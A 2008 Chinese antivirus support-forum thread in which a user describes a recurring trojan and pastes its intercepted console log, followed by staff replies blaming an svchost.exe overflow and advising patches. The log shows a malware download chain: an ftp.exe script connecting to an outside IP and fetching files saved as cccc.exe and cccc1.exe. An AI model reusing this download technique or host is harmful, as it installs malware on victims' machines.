微点交流论坛

标题: 求助 [打印本页]

作者: lr494 时间: 2008-5-5 21:20 标题: 求助

电脑出现木马，微点可以拦截但无法根治，一天出现几率在4次以上。现象：自动运行CMD命令，然后生成零时文件，释放出CCCC.EXE程序，CCCC。EXE连接外网。被微点拦截后得DOS提示如下：
C:\WINNT\system32>del cccc.exe
找不到 C:\WINNT\system32\cccc.exe

C:\WINNT\system32>ftp.exe -s:C:\WINNT\help\help.dll
ftp> OPEN 218.83.161.96
Connected to 218.83.161.96.
220 Serv-U FTP Server v6.4 for WinSock ready...
User (218.83.161.96:(none)):
230 User logged in, proceed.
ftp> get crr.ini cccc.exe
200 PORT Command successful.
150 Opening ASCII mode data connection for crr.ini (39949 Bytes).
226 Transfer complete.
ftp: 39949 bytes received in 1.80Seconds 22.24Kbytes/sec.
ftp> get crt.ini cccc1.exe
200 PORT Command successful.
150 Opening ASCII mode data connection for crt.ini (3721 Bytes).

作者: Legend 时间: 2008-5-5 21:23
请将您的技术支持信息（微点主界面-->辅助功能-->生成技术支持信息）发送到support@micropoint.com.cn我们帮您分析一下。
请在信中附上这个帖子的地址，方便帮您查收处理。

作者: Legend 时间: 2008-5-13 11:00
此问题是由于svchost.exe被溢出导致的，请楼主安装系统补丁，并开启微点防火墙进行防御。

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn